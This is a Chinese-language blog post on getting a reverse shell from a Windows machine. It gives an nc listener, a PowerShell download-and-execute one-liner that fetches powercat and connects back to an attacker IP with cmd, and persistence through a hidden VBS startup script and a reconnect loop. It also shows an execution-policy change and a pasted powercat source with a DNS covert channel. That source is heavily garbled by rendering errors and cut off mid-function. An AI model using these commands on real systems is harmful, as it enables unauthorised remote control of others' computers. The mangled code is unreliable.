反弹Windows shell

最新推荐文章于 2024-08-31 19:13:42 发布
最新推荐文章于 2024-08-31 19:13:42 发布
阅读量866 收藏
点赞数
分类专栏: 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44195175/article/details/109722766
版权
  • 方法:目标机powershell +攻击机nc
  1. 攻击机器运行:nc -l 2222
  1. 目标机:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.1.120 -p 2222 -e cmd

出现的问题:

  • curl : 未能解析此远程名称: ‘raw.githubusercontent.com’
    • 网络的原因无法加载远程的脚本内容
    • 解决办法:使用其他办法把它下在目标机并且命名为powercat.ps1 之后运行(powershell环境)
Import-Module ./powercat.ps1
powercat -c 192.168.1.120 -p 2222 -e cmd

如何让电脑后台开机自启动:使用vbs脚本,在里面启动bat脚本

set ws=WScript.CreateObject("WScript.Shell") 
ws.Run "C:\Users\yaozhengbing\Desktop\shell.bat /start",0

windows下win+R输入shell:common startup调出启动文件 将脚本添加进去

  • 在此系统上禁止运行脚本
    • 更改运行策略
    • set-ExecutionPolicy RemoteSigned
      综上目标机器执行(可以不用进入powershell环境)
powershell Import-Module C:Windows\windows.ps1;set-ExecutionPolicy RemoteSigned;powercat -c 192.168.1.120 -p 2222 -e cmd

如果要一直保持链接状态

Dim Count:Count = 5 
Do Until Count = 0 
  powershell Import-Module C:Windows\windows.ps1;set-ExecutionPolicy RemoteSigned;powercat -c 192.168.1.120 -p 2222 -e cmd
Loop

将下面的脚本保存为powercat.ps1

function powercat
{
param(
[alias(“Client”)][string] c = " " , [ a l i a s ( " L i s t e n " ) ] [ s w i t c h ] c="", [alias("Listen")][switch] c="",[alias("Listen")][switch]l= F a l s e , [ a l i a s ( " P o r t " ) ] [ P a r a m e t e r ( P o s i t i o n = − 1 ) ] [ s t r i n g ] False, [alias("Port")][Parameter(Position=-1)][string] False,[alias("Port")][Parameter(Position=1)][string]p="",
[alias(“Execute”)][string] e = " " , [ a l i a s ( " E x e c u t e P o w e r s h e l l " ) ] [ s w i t c h ] e="", [alias("ExecutePowershell")][switch] e="",[alias("ExecutePowershell")][switch]ep= F a l s e , [ a l i a s ( " R e l a y " ) ] [ s t r i n g ] False, [alias("Relay")][string] False,[alias("Relay")][string]r="",
[alias(“UDP”)][switch] u = u= u=False,
[alias(“dnscat2”)][string] d n s = " " , [ a l i a s ( " D N S F a i l u r e T h r e s h o l d " ) ] [ i n t 32 ] dns="", [alias("DNSFailureThreshold")][int32] dns="",[alias("DNSFailureThreshold")][int32]dnsft=10,
[alias(“Timeout”)][int32] t = 60 , [ P a r a m e t e r ( V a l u e F r o m P i p e l i n e = t=60, [Parameter(ValueFromPipeline= t=60,[Parameter(ValueFromPipeline=True)][alias(“Input”)] i = i= i=null,
[ValidateSet(‘Host’, ‘Bytes’, ‘String’)][alias(“OutputType”)][string] o = " H o s t " , [ a l i a s ( " O u t p u t F i l e " ) ] [ s t r i n g ] o="Host", [alias("OutputFile")][string] o="Host",[alias("OutputFile")][string]of="",
[alias(“Disconnect”)][switch] d = d= d=False,
[alias(“Repeater”)][switch] r e p = rep= rep=False,
[alias(“GeneratePayload”)][switch] g = g= g=False,
[alias(“GenerateEncoded”)][switch] g e = ge= ge=False,
[alias(“Help”)][switch] h = h= h=False
)

############### HELP ###############
$Help = "
powercat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powercat

This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.

Usage: powercat [-c or -l] [-p port] [options]

-c Client Mode. Provide the IP of the system you wish to connect to.
If you are using -dns, specify the DNS Server to send queries to.

-l Listen Mode. Start a listener on the port specified by -p.

-p Port. The port to connect to, or the port to listen on.

-e Execute. Specify the name of the process to start.

-ep Execute Powershell. Start a pseudo powershell session. You can
declare variables and execute commands, but if you try to enter
another shell (nslookup, netsh, cmd, etc.) the shell will hang.

-r Relay. Used for relaying network traffic between two nodes.
Client Relay Format: -r ::
Listener Relay Format: -r :
DNSCat2 Relay Format: -r dns:::

-u UDP Mode. Send traffic over UDP. Because it’s UDP, the client
must send data before the server can respond.

-dns DNS Mode. Send traffic over the dnscat2 dns covert channel.
Specify the dns server to -c, the dns port to -p, and specify the
domain to this option, -dns. This is only a client.
Get the server here: https://github.com/iagox86/dnscat2

-dnsft DNS Failure Threshold. This is how many bad packets the client can
recieve before exiting. Set to zero when receiving files, and set high
for more stability over the internet.

-t Timeout. The number of seconds to wait before giving up on listening or
connecting. Default: 60

-i Input. Provide data to be sent down the pipe as soon as a connection is
established. Used for moving files. You can provide the path to a file,
a byte array object, or a string. You can also pipe any of those into
powercat, like ‘aaaaaa’ | powercat -c 10.1.1.1 -p 80

-o Output. Specify how powercat should return information to the console.
Valid options are ‘Bytes’, ‘String’, or ‘Host’. Default is ‘Host’.

-of Output File. Specify the path to a file to write output to.

-d Disconnect. powercat will disconnect after the connection is established
and the input from -i is sent. Used for scanning.

-rep Repeater. powercat will continually restart after it is disconnected.
Used for setting up a persistent server.

-g Generate Payload. Returns a script as a string which will execute the
powercat with the options you have specified. -i, -d, and -rep will not
be incorporated.

-ge Generate Encoded Payload. Does the same as -g, but returns a string which
can be executed in this way: powershell -E

-h Print this help message.

Examples:

Listen on port 8000 and print the output to the console.
powercat -l -p 8000

Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
powercat -c 10.1.1.1 -p 443 -e cmd -v

Connect to the dnscat2 server on c2.example.com, and send dns queries
to the dns server on 10.1.1.1 port 53.
powercat -c 10.1.1.1 -p 53 -dns c2.example.com

Send a file to 10.1.1.15 port 8000.
powercat -c 10.1.1.15 -p 8000 -i C:\inputfile

Write the data sent to the local listener on port 4444 to C:\outfile
powercat -l -p 4444 -of C:\outfile

Listen on port 8000 and repeatedly server a powershell shell.
powercat -l -p 8000 -ep -rep

Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
powercat -l -p 8000 -r tcp:10.1.1.1:9000

Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
sending queries to 10.1.1.1 port 53.
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
"
if($h){return $Help}
############### HELP ###############

############### VALIDATE ARGS ###############
$global:Verbose = V e r b o s e i f ( Verbose if( Verboseif(of -ne ‘’){KaTeX parse error: Expected 'EOF', got '}' at position 12: o = 'Bytes'}̲ if(dns -eq “”)
{
if((( c − e q " " ) − a n d ( ! c -eq "") -and (! ceq"")and(!l)) -or (($c -ne “”) -and l ) ) r e t u r n " Y o u m u s t s e l e c t e i t h e r c l i e n t m o d e ( − c ) o r l i s t e n m o d e ( − l ) . " i f ( l)){return "You must select either client mode (-c) or listen mode (-l)."} if( l))return"Youmustselecteitherclientmode(c)orlistenmode(l)."if(p -eq “”){return “Please provide a port number to -p.”}
}
if(((( r − n e " " ) − a n d ( r -ne "") -and ( rne"")and(e -ne “”)) -or (( e − n e " " ) − a n d ( e -ne "") -and ( ene"")and(ep))) -or (( r − n e " " ) − a n d ( r -ne "") -and ( rne"")and(ep))){return “You can only pick one of these: -e, -ep, -r”}
if(($i -ne n u l l ) − a n d ( ( null) -and (( null)and((r -ne “”) -or ( e − n e " " ) ) ) r e t u r n " − i i s n o t a p p l i c a b l e h e r e . " i f ( e -ne ""))){return "-i is not applicable here."} if( ene"")))return"iisnotapplicablehere."if(l)
{
$Failure = F a l s e n e t s t a t − n a ∣ S e l e c t − S t r i n g L I S T E N I N G ∣ False netstat -na | Select-String LISTENING | % {if(( FalsenetstatnaSelectStringLISTENING.ToString().split("😊[1].split(" “)[0]) -eq $p){Write-Output (“The selected port " + $p + " is already in use.”) ; F a i l u r e = Failure= Failure=True}}
if(KaTeX parse error: Expected 'EOF', got '}' at position 19: …lure){break} }̲ if(r -ne “”)
{
if($r.split(”😊.Count -eq 2)
{
$Failure = F a l s e n e t s t a t − n a ∣ S e l e c t − S t r i n g L I S T E N I N G ∣ False netstat -na | Select-String LISTENING | % {if(( FalsenetstatnaSelectStringLISTENING.ToString().split("😊[1].split(" “)[0]) -eq $r.split(”😊[1]){Write-Output (“The selected port " + $r.split(”😊[1] + " is already in use.") ; F a i l u r e = Failure= Failure=True}}
if($Failure){break}
}
}
############### VALIDATE ARGS ###############

############### UDP FUNCTIONS ###############
function Setup_UDP
{
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = $True}
c , c, c,l, p , p, p,t = $FuncSetupVars
$FuncVars = @{}
F u n c V a r s [ " E n c o d i n g " ] = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g i f ( FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding if( FuncVars["Encoding"]=NewObjectSystem.Text.AsciiEncodingif(l)
{
$SocketDestinationBuffer = New-Object System.Byte[] 65536
$EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
$FuncVars[“Socket”] = New-Object System.Net.Sockets.UDPClient $p
$PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
Write-Verbose (“Listening on [0.0.0.0] port " + $p + " [udp]”)
$ConnectHandle = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e M e s s a g e F r o m ( FuncVars["Socket"].Client.BeginReceiveMessageFrom( FuncVars["Socket"].Client.BeginReceiveMessageFrom(SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref] E n d P o i n t , EndPoint, EndPoint,null,$null)
S t o p w a t c h = [ S y s t e m . D i a g n o s t i c s . S t o p w a t c h ] : : S t a r t N e w ( ) w h i l e ( Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while( Stopwatch=[System.Diagnostics.Stopwatch]::StartNew()while(True)
{
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …27) -contains (Host.UI.RawUI.ReadKey(“NoEcho,IncludeKeyDown,IncludeKeyUp”).VirtualKeyCode))
{
Write-Verbose “CTRL or ESC caught. Stopping UDP Setup…”
$FuncVars[“Socket”].Close()
KaTeX parse error: Expected 'EOF', got '}' at position 46: …reak }̲ } …Stopwatch.Elapsed.TotalSeconds -gt $t)
{
$FuncVars[“Socket”].Close()
KaTeX parse error: Expected 'EOF', got '}' at position 69: … break }̲ if(ConnectHandle.IsCompleted)
{
$SocketBytesRead = F u n c V a r s [ " S o c k e t " ] . C l i e n t . E n d R e c e i v e M e s s a g e F r o m ( FuncVars["Socket"].Client.EndReceiveMessageFrom( FuncVars["Socket"].Client.EndReceiveMessageFrom(ConnectHandle,ref,[ref] E n d P o i n t , [ r e f ] EndPoint,[ref] EndPoint,[ref]PacketInfo)
Write-Verbose (“Connection from [” + $EndPoint.Address.IPAddressToString + “] port " + $p + " [udp] accepted (source port " + E n d P o i n t . P o r t + " ) " ) i f ( EndPoint.Port + ")") if( EndPoint.Port+")")if(SocketBytesRead -gt 0){break}
else{break}
}
}
$Stopwatch.Stop()
$FuncVars[“InitialConnectionBytes”] = S o c k e t D e s t i n a t i o n B u f f e r [ 0.. ( [ i n t ] SocketDestinationBuffer[0..([int] SocketDestinationBuffer[0..([int]SocketBytesRead-1)]
}
else
{
if(!$c.Contains(”."))
{
I P L i s t = @ ( ) [ S y s t e m . N e t . D n s ] : : G e t H o s t A d d r e s s e s ( IPList = @() [System.Net.Dns]::GetHostAddresses( IPList=@()[System.Net.Dns]::GetHostAddresses(c) | Where-Object {KaTeX parse error: Expected 'EOF', got '}' at position 35: … "InterNetwork"}̲ | %{IPList += $_.IPAddressToString}
Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
E n d P o i n t = N e w − O b j e c t S y s t e m . N e t . I P E n d P o i n t ( [ S y s t e m . N e t . I P A d d r e s s ] : : P a r s e ( EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse( EndPoint=NewObjectSystem.Net.IPEndPoint([System.Net.IPAddress]::Parse(IPList[0])), $p
}
else
{
E n d P o i n t = N e w − O b j e c t S y s t e m . N e t . I P E n d P o i n t ( [ S y s t e m . N e t . I P A d d r e s s ] : : P a r s e ( EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse( EndPoint=NewObjectSystem.Net.IPEndPoint([System.Net.IPAddress]::Parse(c)), $p
}
$FuncVars[“Socket”] = New-Object System.Net.Sockets.UDPClient
F u n c V a r s [ " S o c k e t " ] . C o n n e c t ( FuncVars["Socket"].Connect( FuncVars["Socket"].Connect(c,$p)
Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + “…”)
Write-Verbose (“UDP: Make sure to send some data so the server can notice you!”)
}
$FuncVars[“BufferSize”] = 65536
$FuncVars[“EndPoint”] = $EndPoint
$FuncVars[“StreamDestinationBuffer”] = New-Object System.Byte[] $FuncVars[“BufferSize”]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e F r o m ( FuncVars["Socket"].Client.BeginReceiveFrom( FuncVars["Socket"].Client.BeginReceiveFrom(FuncVars[“StreamDestinationBuffer”],0, F u n c V a r s [ " B u f f e r S i z e " ] , ( [ S y s t e m . N e t . S o c k e t s . S o c k e t F l a g s ] : : N o n e ) , [ r e f ] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]FuncVars[“EndPoint”], n u l l , null, null,null)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
$Data = n u l l i f ( null if( nullif(FuncVars[“StreamReadOperation”].IsCompleted)
{
$StreamBytesRead = F u n c V a r s [ " S o c k e t " ] . C l i e n t . E n d R e c e i v e F r o m ( FuncVars["Socket"].Client.EndReceiveFrom( FuncVars["Socket"].Client.EndReceiveFrom(FuncVars[“StreamReadOperation”],[ref] F u n c V a r s [ " E n d P o i n t " ] ) i f ( FuncVars["EndPoint"]) if( FuncVars["EndPoint"])if(StreamBytesRead -eq 0){break}
$Data = F u n c V a r s [ " S t r e a m D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StreamDestinationBuffer"][0..([int] FuncVars["StreamDestinationBuffer"][0..([int]StreamBytesRead-1)]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e F r o m ( FuncVars["Socket"].Client.BeginReceiveFrom( FuncVars["Socket"].Client.BeginReceiveFrom(FuncVars[“StreamDestinationBuffer”],0, F u n c V a r s [ " B u f f e r S i z e " ] , ( [ S y s t e m . N e t . S o c k e t s . S o c k e t F l a g s ] : : N o n e ) , [ r e f ] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]FuncVars[“EndPoint”], n u l l , null, null,null)
}
return D a t a , Data, Data,FuncVars
}
function WriteData_UDP
{
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " S o c k e t " ] . C l i e n t . S e n d T o ( FuncVars["Socket"].Client.SendTo( FuncVars["Socket"].Client.SendTo(Data,$FuncVars[“EndPoint”]) | Out-Null
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
$FuncVars[“Socket”].Close()
}
############### UDP FUNCTIONS ###############

############### DNS FUNCTIONS ###############
function Setup_DNS
{
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = KaTeX parse error: Expected 'EOF', got '}' at position 5: True}̲ function C…String)
$Hex = @()
S t r i n g . T o C h a r A r r a y ( ) ∣ String.ToCharArray() | % {"{0:x}" -f [byte] String.ToCharArray()} | % {if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …{"0" + [string]} else{[string]KaTeX parse error: Expected group after '_' at position 1: _̲}} | % {Hex += $_}
return $Hex
}

function SendPacket
{
  param($Packet,$DNSServer,$DNSPort)
  $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
  $result = ($Command | nslookup 2>&1 | Out-String)
  if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
  else{return 1}
}

function Create_SYN
{
  param($SessionId,$SeqNum,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
}

function Create_FIN
{
  param($SessionId,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
}

function Create_MSG
{
  param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
}

function DecodePacket
{
  param($Packet)

  if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
  $AcknowledgementNumber = ($Packet[10..13] -join "")
  $SeqNum = ($Packet[14..17] -join "")
  [byte[]]$ReturningData = @()

  if($Packet.Length -gt 18)
  {
    $PacketElim = $Packet.Substring(18)
    while($PacketElim.Length -gt 0)
    {
      $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
      $PacketElim = $PacketElim.Substring(2)
    }
  }

  return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
}

function AcknowledgeData
{
  param($ReturningData,$AcknowledgementNumber)
  $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
  if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
  return $Hex
}
$FuncVars = @{}
$FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
$FuncVars["Tag"] = ""
$FuncVars["Domain"] = ("." + $FuncVars["Domain"])

$FuncVars["Create_SYN"] = ${function:Create_SYN}
$FuncVars["Create_MSG"] = ${function:Create_MSG}
$FuncVars["Create_FIN"] = ${function:Create_FIN}
$FuncVars["DecodePacket"] = ${function:DecodePacket}
$FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
$FuncVars["AckData"] = ${function:AcknowledgeData}
$FuncVars["SendPacket"] = ${function:SendPacket}
$FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["Failures"] = 0

$SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
$ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
$DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
$ReturningData = $DecodedPacket[1]
if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
$FuncVars["AckNum"] = $DecodedPacket[2]
$FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
return $FuncVars

}
function ReadData_DNS
{
param( F u n c V a r s ) i f ( FuncVars) if( FuncVars)if(global:Verbose){$Verbose = $True}

$PacketsData = @()
$PacketData = ""

if($FuncVars["InputData"] -ne $null)
{
  $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
  $SectionCount = 0
  $PacketCount = 0
  foreach($Char in $Hex)
  {
    if($SectionCount -ge 30)
    {
      $SectionCount = 0
      $PacketData += "."
    }
    if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
    {
      $PacketsData += $PacketData.TrimEnd(".")
      $PacketCount = 0
      $SectionCount = 0
      $PacketData = ""
    }
    $PacketData += $Char
    $SectionCount += 2
    $PacketCount += 2
  }
  $PacketData = $PacketData.TrimEnd(".")
  $PacketsData += $PacketData
  $FuncVars["InputData"] = ""
}
else
{
  $PacketsData = @("")
}

[byte[]]$ReturningData = @()
foreach($PacketData in $PacketsData)
{
  try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
  catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
  try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
  catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
  try
  {
    $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
    if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
    $FuncVars["AckNum"] = $DecodedPacket[2]
    $FuncVars["SeqNum"] = $DecodedPacket[3]
    $ReturningData += $DecodedPacket[1]
  }
  catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
  if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
}

if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}

if($ReturningData -ne @())
{
  $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
}
return $ReturningData,$FuncVars

}
function WriteData_DNS
{
param( D a t a , Data, Data,FuncVars)
$FuncVars[“InputData”] = F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
$FINPacket = Invoke-Command F u n c V a r s [ " C r e a t e F I N " ] − A r g u m e n t L i s t @ ( FuncVars["Create_FIN"] -ArgumentList @( FuncVars["CreateFIN"]ArgumentList@(FuncVars[“SessionId”], F u n c V a r s [ " T a g " ] , FuncVars["Tag"], FuncVars["Tag"],FuncVars[“Domain”])
Invoke-Command F u n c V a r s [ " S e n d P a c k e t " ] − A r g u m e n t L i s t @ ( FuncVars["SendPacket"] -ArgumentList @( FuncVars["SendPacket"]ArgumentList@(FINPacket, F u n c V a r s [ " D N S S e r v e r " ] , FuncVars["DNSServer"], FuncVars["DNSServer"],FuncVars[“DNSPort”]) | Out-Null
}
############### DNS FUNCTIONS ###############

########## TCP FUNCTIONS ##########
function Setup_TCP
{
param($FuncSetupVars)
c , c, c,l, p , p, p,t = F u n c S e t u p V a r s i f ( FuncSetupVars if( FuncSetupVarsif(global:Verbose){$Verbose = $True}
F u n c V a r s = @ i f ( ! FuncVars = @{} if(! FuncVars=@if(!l)
{
$FuncVars[“l”] = $False
$Socket = New-Object System.Net.Sockets.TcpClient
Write-Verbose “Connecting…”
$Handle = S o c k e t . B e g i n C o n n e c t ( Socket.BeginConnect( Socket.BeginConnect(c, p , p, p,null,$null)
}
else
{
$FuncVars[“l”] = $True
Write-Verbose ("Listening on [0.0.0.0] (port " + $p + “)”)
$Socket = New-Object System.Net.Sockets.TcpListener $p
$Socket.Start()
$Handle = S o c k e t . B e g i n A c c e p t T c p C l i e n t ( Socket.BeginAcceptTcpClient( Socket.BeginAcceptTcpClient(null, $null)
}

$Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
while($True)
{
  if($Host.UI.RawUI.KeyAvailable)
  {
    if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
    {
      Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
      if($FuncVars["l"]){$Socket.Stop()}
      else{$Socket.Close()}
      $Stopwatch.Stop()
      break
    }
  }
  if($Stopwatch.Elapsed.TotalSeconds -gt $t)
  {
    if(!$l){$Socket.Close()}
    else{$Socket.Stop()}
    $Stopwatch.Stop()
    Write-Verbose "Timeout!" ; break
    break
  }
  if($Handle.IsCompleted)
  {
    if(!$l)
    {
      try
      {
        $Socket.EndConnect($Handle)
        $Stream = $Socket.GetStream()
        $BufferSize = $Socket.ReceiveBufferSize
        Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
      }
      catch{$Socket.Close(); $Stopwatch.Stop(); break}
    }
    else
    {
      $Client = $Socket.EndAcceptTcpClient($Handle)
      $Stream = $Client.GetStream()
      $BufferSize = $Client.ReceiveBufferSize
      Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
    }
    break
  }
}
$Stopwatch.Stop()
if($Socket -eq $null){break}
$FuncVars["Stream"] = $Stream
$FuncVars["Socket"] = $Socket
$FuncVars["BufferSize"] = $BufferSize
$FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
$FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["StreamBytesRead"] = 1
return $FuncVars

}
function ReadData_TCP
{
param($FuncVars)
$Data = n u l l i f ( null if( nullif(FuncVars[“StreamBytesRead”] -eq 0){break}
if($FuncVars[“StreamReadOperation”].IsCompleted)
{
$StreamBytesRead = F u n c V a r s [ " S t r e a m " ] . E n d R e a d ( FuncVars["Stream"].EndRead( FuncVars["Stream"].EndRead(FuncVars[“StreamReadOperation”])
if($StreamBytesRead -eq 0){break}
$Data = F u n c V a r s [ " S t r e a m D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StreamDestinationBuffer"][0..([int] FuncVars["StreamDestinationBuffer"][0..([int]StreamBytesRead-1)]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S t r e a m " ] . B e g i n R e a d ( FuncVars["Stream"].BeginRead( FuncVars["Stream"].BeginRead(FuncVars[“StreamDestinationBuffer”], 0, $FuncVars[“BufferSize”], $null, $null)
}
return D a t a , Data, Data,FuncVars
}
function WriteData_TCP
{
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " S t r e a m " ] . W r i t e ( FuncVars["Stream"].Write( FuncVars["Stream"].Write(Data, 0, $Data.Length)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
try{KaTeX parse error: Expected 'EOF', got '}' at position 27: …tream"].Close()}̲ catch{} …FuncVars[“l”]){KaTeX parse error: Expected 'EOF', got '}' at position 26: …Socket"].Stop()}̲ else{FuncVars[“Socket”].Close()}
}
########## TCP FUNCTIONS ##########

########## CMD FUNCTIONS ##########
function Setup_CMD
{
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = $True}
$FuncVars = @{}
$ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessStartInfo.FileName = $FuncSetupVars[0]
$ProcessStartInfo.UseShellExecute = $False
$ProcessStartInfo.RedirectStandardInput = $True
$ProcessStartInfo.RedirectStandardOutput = $True
$ProcessStartInfo.RedirectStandardError = $True
F u n c V a r s [ " P r o c e s s " ] = [ S y s t e m . D i a g n o s t i c s . P r o c e s s ] : : S t a r t ( FuncVars["Process"] = [System.Diagnostics.Process]::Start( FuncVars["Process"]=[System.Diagnostics.Process]::Start(ProcessStartInfo)
Write-Verbose ("Starting Process " + $FuncSetupVars[0] + “…”)
$FuncVars[“Process”].Start() | Out-Null
$FuncVars[“StdOutDestinationBuffer”] = New-Object System.Byte[] 65536
$FuncVars[“StdOutReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardOutput.BaseStream.BeginRead( FuncVars["Process"].StandardOutput.BaseStream.BeginRead(FuncVars[“StdOutDestinationBuffer”], 0, 65536, $null, $null)
$FuncVars[“StdErrDestinationBuffer”] = New-Object System.Byte[] 65536
$FuncVars[“StdErrReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardError.BaseStream.BeginRead( FuncVars["Process"].StandardError.BaseStream.BeginRead(FuncVars[“StdErrDestinationBuffer”], 0, 65536, $null, $null)
$FuncVars[“Encoding”] = New-Object System.Text.AsciiEncoding
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
[byte[]] D a t a = @ ( ) i f ( Data = @() if( Data=@()if(FuncVars[“StdOutReadOperation”].IsCompleted)
{
